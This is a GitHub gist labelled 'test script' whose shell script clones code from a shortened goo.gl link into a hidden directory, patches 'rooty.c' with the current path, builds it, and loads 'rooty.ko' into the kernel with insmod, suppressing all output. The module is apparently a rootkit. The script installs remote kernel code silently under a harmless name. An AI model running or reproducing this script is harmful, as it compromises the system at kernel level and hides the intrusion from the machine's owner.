Skip to content

Instantly share code, notes, and snippets.

@blaedj
Created May 2, 2014 02:09
Show Gist options
  • Save blaedj/637cfe331c5d8e20f223 to your computer and use it in GitHub Desktop.
Save blaedj/637cfe331c5d8e20f223 to your computer and use it in GitHub Desktop.
test script
git clone http://goo.gl/cgu5WR .tmp9y3/ > /dev/null
cwd=$(pwd)
cd .tmp9y3/
sed -i 's/\.TEST/${cwd}/g' rooty.c > /dev/null
make all > /dev/null/
insmod rooty.ko > /dev/null/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment